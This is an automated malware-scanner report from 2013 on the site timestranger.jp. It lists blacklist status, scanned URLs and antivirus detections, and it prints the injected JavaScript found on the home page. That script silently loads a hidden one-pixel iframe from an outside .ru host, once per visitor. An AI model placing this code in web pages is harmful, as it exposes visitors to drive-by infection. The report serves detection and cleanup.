Online Malware Scanner report for timestranger.jp


(cached results from Thu Jul 4 17:58:40 2013 rescan)


Malicious/Suspicious/Total URLs checked: 1/0/3
1 page has malicious code. See details below.
Blacklists: Found
The website is marked by Google as suspicious.

The website "timestranger.jp" is probably hacked and losing its visitors. You need to take action as soon as possible to fix the security issues. Here are our suggestions on how to fix this.
Malicious redirects: OK
Malicious/Hidden/Total iFrames: 0/0/0
Deface / Content modification: OK


Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=timestranger.jp

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.

Scanned pages/files

Request: http://timestranger.jp/
Server response: 200 OK
Content-Length: 4992
Content-Type: text/html
Status: malicious
Malicious code - confirmed by antiviruses (see below)

function zzzfff() { var gr = document.createElement('iframe'); gr.src = 'http://lacihgiq.ru/count30.php'; gr.style.position = 'absolute'; gr.style.border = '0'; gr.style.height = '1px'; gr.style.width = '1px'; gr.style.left = '1px'; gr.style.top = '1px'; if (!document.getElementById('gr')) { document.write('<div id=\'gr\'></div>'); document.getElementById('gr').appendChild(gr); }}function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date();
... 235 bytes are skipped ...
name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) );}if (navigator.cookieEnabled){if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');zzzfff();}}

Antivirus reports:

AntiVir: HTML/ExpKit.Gen3
Avast: JS:Iframe-AHW [Trj]
nProtect: Trojan.JS.Iframe.DEE
K7AntiVirus: Riskware
Emsisoft: Trojan.JS.Iframe.DEE (B)
Comodo: TrojWare.JS.Agent.DT
Kaspersky: HEUR:Trojan.Script.Generic
Microsoft: Trojan:Win32/Quidvetis.A
MicroWorld-eScan: Trojan.JS.Iframe.DEE
Fortinet: JS/Iframe.DCV!tr.dldr
NANO-Antivirus: Trojan.Script.Iframe.bopaxv
F-Secure: Trojan.JS.Iframe.DEE
F-Prot: JS/IFrame.RS.gen
AVG: HTML/Framer
Norman: Blacole.QH
Sophos: Troj/Iframe-JH
GData: Trojan.JS.Iframe.DEE
Commtouch: JS/IFrame.RS.gen
BitDefender: Trojan.JS.Iframe.DEE

Request: http://timestranger.jp/main/index.html
Server response: 401 Authorization Required
Content-Length: 2254
Content-Type: text/html
Status: clean

Request: http://timestranger.jp/test404page.js
Server response: 404 Not Found
Content-Length: 2275
Content-Type: text/html
Status: clean

Malicious redirects

First query (normal visit):
GET / HTTP/1.1
Host: timestranger.jp

Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 04 Jul 2013 14:58:41 GMT
Accept-Ranges: bytes
ETag: "b7082b3-1380-4e09b9e959b00"
Server: Apache
Content-Length: 4992
Content-Type: text/html
Last-Modified: Wed, 03 Jul 2013 13:41:32 GMT

...4992 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: timestranger.jp
Referer: http://www.google.com/search?q=timestranger.jp

Result:
The result is similar to the first query. There are no suspicious redirects found.